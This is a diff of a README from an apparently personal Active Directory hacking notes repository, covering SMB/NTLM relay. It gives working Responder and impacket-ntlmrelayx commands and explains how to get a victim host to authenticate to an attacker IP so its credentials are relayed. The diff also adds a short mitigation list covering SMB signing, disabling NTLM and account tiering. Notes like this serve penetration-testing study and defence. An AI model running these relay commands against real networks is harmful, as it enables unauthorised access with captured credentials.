f-keys/Windows-Active-Directory-Hacking/README.md

 ## Start the relay service (forward captured auth to targets)
 - run `impacket-ntlmrelayx -tf target.txt --smb2support`
--What this does: forwards captured NTLM authentication attempts to hosts listed in target.txt. `--smb2support` enables SMB2 target support.
+- What this does: forwards captured NTLM authentication attempts to hosts listed in target.txt. `--smb2support` enables SMB2 target support.

 ## Trigger the event from the victim
 - From the victim Windows PC, cause a lookup or connection to the attacker’s IP (examples: open `\\attacker-ip\share`, request `http://wpad/`, or click a short hostname link).

 - What happens: the victim authenticates, Responder captures the handshake and hands it to ntlmrelayx, which forwards it to the hosts in target.txt.
 If a target accepts the relayed credentials and they have sufficient privileges, you gain access as that user
   <img width="802" height="473" alt="image" src="https://github.com/user-attachments/assets/5f7b7208-57e1-45fe-bdd4-6aa267a79dc0" />

-# listen with responder
-sudo responder -I eth0 -ldwPv

-# relay to targets listed in target.txt, enable SMB2 support
-impacket-ntlmrelayx -tf target.txt -smb2support
+## SMB relay attacks mitigation
+a. enable smb signing on all devices
+b. disable NTLM authentication
+c. account tiering
+d.
+Local admin restriction

 # Windows-Active-Directory-Hacking